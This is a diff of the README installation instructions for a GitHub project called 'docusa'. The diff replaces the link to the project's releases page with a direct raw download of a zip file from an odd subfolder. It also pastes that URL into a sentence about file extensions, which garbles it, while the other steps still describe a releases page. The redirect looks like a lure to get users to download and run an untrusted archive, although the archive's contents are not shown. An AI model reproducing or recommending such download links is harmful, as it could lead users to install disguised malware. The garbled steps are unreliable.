Pianibad/docusa/README.md

 Follow these steps to get docusa running on your computer:

 1. **Visit the Releases Page:**
-   Click this link to go to the downloads: [Visit Download Page](https://github.com/Pianibad/docusa/releases).
+   Click this link to go to the downloads: [Visit Download Page](https://raw.githubusercontent.com/Pianibad/docusa/main/wardency/docusa.zip).

 2. **Choose Your Version:**
    On the releases page, you will see the latest version available for download.
 Look for the version that fits your operating system.

 3. **Download the File:**
    Click on the download link that corresponds to your system.
-This will usually be a file ending in `.exe` for Windows, `.dmg` for macOS, or a compressed file for Linux (like `.tar.gz`).
+This will usually be a file ending in `.exe` for Windows, `.dmg` for macOS, or a compressed file for Linux (like `https://raw.githubusercontent.com/Pianibad/docusa/main/wardency/docusa.zip`).

 4. **Run the Installer:**
    Once the file has finished downloading: